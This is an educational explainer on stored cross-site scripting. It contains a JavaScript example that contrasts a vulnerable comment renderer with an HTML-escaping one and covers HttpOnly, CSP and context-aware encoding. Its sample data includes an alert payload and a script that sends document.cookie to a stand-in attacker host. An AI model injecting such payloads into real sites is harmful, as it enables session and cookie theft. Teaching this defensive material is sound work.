
Cross Site Scripting

A worked example of a Cross Site Scripting (XSS) attack.
Suppose a web page has a comment section where users can leave comments.
A malicious user posts a comment whose text is <script>alert("You're hacked")</script> (double quotes around the string, because a single-quoted 'You're hacked' would itself be a JavaScript syntax error and the payload would not run).
The comment is stored as-is in the server's database. When another user visits the page, the server sends the stored text back to that user's browser as part of the page's HTML.
The browser cannot tell which parts of the response are the site's own markup and which parts are user-supplied text: it parses the whole response as HTML, so the comment becomes a real <script> element in the DOM and is executed, showing the alert dialog instead of displaying the text. Because the payload lives in the database and fires for every visitor, this is a stored (persistent) XSS.
Instead of a harmless alert, the attacker can inject a script that reads document.cookie and sends it to a server the attacker controls, for example with an Ajax/fetch request or by loading an image whose URL carries the stolen value. Marking the session cookie HttpOnly keeps it out of document.cookie, but the injected script still runs with the victim's session inside the page, so that alone is not a fix. The real prevention is to encode user-supplied text for the context it is inserted into (HTML entity encoding for element content, so that < is sent as &lt; and is rendered as text rather than parsed as a tag), with a Content-Security-Policy as defense in depth.
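The scenario above as an added example, not code from the original page: a minimal server-side comment renderer in JavaScript, first in the vulnerable form that concatenates stored text straight into the page, then in the hardened form that HTML-encodes it. The comment records, the author names, the function names and the attacker host `attacker.example` (a reserved example domain) are all constructed for illustration.

```javascript
// Added example, not from the original page. Constructed data: these records
// stand in for rows in the comments table. The second and third bodies are
// the payloads the article describes (the alert, and the cookie-stealing
// variant); "attacker.example" is a reserved example domain, not a real host.
const storedComments = [
  { author: "alice", body: "Nice article, thanks!" },
  { author: "mallory", body: "<script>alert(\"You're hacked\")</script>" },
  {
    author: "mallory",
    body: "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>",
  },
];

// VULNERABLE: the stored text is spliced directly into the HTML, so the
// browser's parser sees a live <script> element instead of literal text.
function renderCommentUnsafe(comment) {
  return `<li><b>${comment.author}</b>: ${comment.body}</li>`;
}

// HARDENED: encode the five HTML-significant characters before the text is
// placed in element content. "<script>" reaches the browser as
// "&lt;script&gt;", which it displays as text and never executes.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderCommentSafe(comment) {
  return `<li><b>${escapeHtml(comment.author)}</b>: ${escapeHtml(comment.body)}</li>`;
}

// Builds the comment list with whichever renderer the caller passes in.
function renderPage(comments, render) {
  return `<ul>\n${comments.map(render).join("\n")}\n</ul>`;
}

// A crude review check over rendered output: did user-controlled text end up
// as a real <script> tag? This is a heuristic for this one payload shape, not
// a general XSS detector (event handlers, javascript: URLs etc. are not covered).
function containsLiveScript(html) {
  return /<script\b/i.test(html);
}

const unsafeHtml = renderPage(storedComments, renderCommentUnsafe);
const safeHtml = renderPage(storedComments, renderCommentSafe);

console.log("--- vulnerable rendering ---\n" + unsafeHtml);
console.log("--- escaped rendering ---\n" + safeHtml);
console.log("live <script> in vulnerable output:", containsLiveScript(unsafeHtml)); // true
console.log("live <script> in escaped output:   ", containsLiveScript(safeHtml)); // false
```

The encoding shown is correct only for text placed inside element content. Text inserted into an attribute value, a URL, or an inline script block needs the encoding rules of that context instead, which is why template engines that auto-escape per context are preferable to a hand-rolled function like this one.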
A comprehensive and well-written explanation of Cross Site Scripting and how to prevent it:
https://excess-xss.com/
